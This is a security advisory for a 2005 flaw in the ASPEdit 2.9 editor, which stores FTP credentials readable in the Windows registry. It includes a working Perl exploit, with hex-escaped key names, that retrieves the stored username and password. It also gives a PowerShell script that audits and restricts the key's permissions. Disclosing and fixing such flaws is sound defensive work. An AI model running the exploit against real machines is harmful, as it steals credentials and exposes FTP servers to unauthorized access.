ASPEdit FTP Password Disclosure

2005.09.30
Credit: basher13
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 4.9/10
Impact Subscore: 6.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: None
Availability impact: None

Version:
ASPEdit 2.9

Operating System:
- All Windows

Typical software:
- Shareware

Severity Flaw:
- high

Description:
ASPEdit is a powerful Active Server Pages and HTML editor with full support for Visual Basic Script, Perl, Cold-fusion, PHP3, MIVA, HDML, WML and Style sheets.

Vulnerability:
The password stored for administration is visible in the Registry Editor. A local user or guest who has the privilege to open the Registry Editor can view and then retrieve the password by searching for the specific vulnerable registry values.

Exploit:

#!/usr/bin/perl
#
# ASPEdit FTP Password Disclosure Exploit
# ---------------------------------------
# Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: http://www.tashcom.co.uk/aspedit
#

use Win32::Registry;

print "\nASPEdit FTP Password Disclosure Exploit\n";
print "---------------------------------------\n\n";
print "Registrie: HLKM\\SOFTWARE\\tashcom\\aspedit\\ftp\n";
sleep(1);

# Registry value names and key path, hex-escaped
$usr = "\x66\x74\x70\x5f\x75\x73\x65\x72";
$pas = "\x66\x74\x70\x5f\x70\x61\x73\x73\x77\x6f\x64";
$nutt = "\x53\x4f\x46\x54\x57\x41\x52\x45\x5c\x5c".
"\x74\x61\x73\x68\x63\x6f\x6d\x5c\x5c\x61".
"\x73\x70\x65\x64\x69\x74\x5c\x5c\x66\x74\x70";

print "[+] Start searching..\n";
print "[+] Finding username ..";
my $user;
$::HKEY_LOCAL_MACHINE->Open("$nutt", $user)
    or die "Can't open username value: $^E";
sleep(1);
print "[OK]\n";
print "[+] Query value username..";
my ($type, $value);
$user->QueryValueEx("$usr", $type, $value)
    or die "No such user: $^E";
sleep(1);
print "[OK]\n";
print "[+] Finding password ..";
my $pass;
$::HKEY_LOCAL_MACHINE->Open("$nutt", $pass)
    or die "Can't open password value: $^E";
sleep(1);
print "[OK]\n";
print "[+] Query value password..";
my ($type1, $value2);
$pass->QueryValueEx("$pas", $type1, $value2)
    or die "No such password: $^E";
sleep(2);
print "[OK]\n";
print "[+] Retrive data registry..\n";
sleep(1);
print "[*] User: $value\n";
print "[*] Password: $value2\n";

Solution:
In the Registry Editor, change the registry path and encrypt the password, which is safer. Also restrict the permissions on the key (Advanced Security Settings), which can be reached by right-clicking the key and choosing 'Permissions'.

Vendor URL:
Mail - bugs@tashcom.com
WWW - http://www.tashcom.com

Published:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / infamous.2hell.com

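The permission change described under Solution can be checked and applied from PowerShell instead of through the Registry Editor dialog. This is an added example, not part of the original advisory: the key path is the one the exploit prints, while the list of broad groups and the -Harden switch are assumptions made for illustration.

```powershell
# Added example: audit, and optionally tighten, the ACL on the ASPEdit FTP key.
# Run elevated for -Harden. Value contents are never printed.
param([switch]$Harden)

# Key named in the advisory. Assumption: on 64-bit Windows a 32-bit install
# may instead live under HKLM:\SOFTWARE\WOW6432Node\tashcom\aspedit\ftp.
$keyPath = 'HKLM:\SOFTWARE\tashcom\aspedit\ftp'

# Assumed "too broad" principals, as well-known SIDs (locale independent):
# Everyone, Authenticated Users, BUILTIN\Users, BUILTIN\Guests.
$broadSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-32-546'
$sidType   = [System.Security.Principal.SecurityIdentifier]
$readValue = [System.Security.AccessControl.RegistryRights]::QueryValues

if (-not (Test-Path -Path $keyPath)) {
    Write-Output "Key not present: $keyPath"
    return
}

# List the stored value names only, so the audit itself discloses nothing.
(Get-Item -Path $keyPath).GetValueNames() |
    ForEach-Object { Write-Output "Stored value: $_" }

# Allow ACEs (explicit and inherited) that let a broad group read values.
$acl = Get-Acl -Path $keyPath
$findings = @($acl.GetAccessRules($true, $true, $sidType) | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    (($_.RegistryRights -band $readValue) -eq $readValue) -and
    $broadSids -contains $_.IdentityReference.Value
})
$findings | ForEach-Object {
    Write-Output "Readable by $($_.IdentityReference.Value): $($_.RegistryRights) (inherited: $($_.IsInherited))"
}

if ($Harden -and $findings.Count -gt 0) {
    # Step 1: stop inheriting from SOFTWARE, keeping copies of inherited ACEs.
    $acl.SetAccessRuleProtection($true, $true)
    Set-Acl -Path $keyPath -AclObject $acl
    # Step 2: reload, then drop every ACE held by the broad principals.
    $acl = Get-Acl -Path $keyPath
    foreach ($sid in $broadSids) { $acl.PurgeAccessRules($sidType::new($sid)) }
    Set-Acl -Path $keyPath -AclObject $acl
    Write-Output "Removed broad-group access from $keyPath"
}
```

After hardening, ASPEdit itself can read its FTP settings only when run by an account that still holds access to the key, so test the editor under a standard user before rolling the change out.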
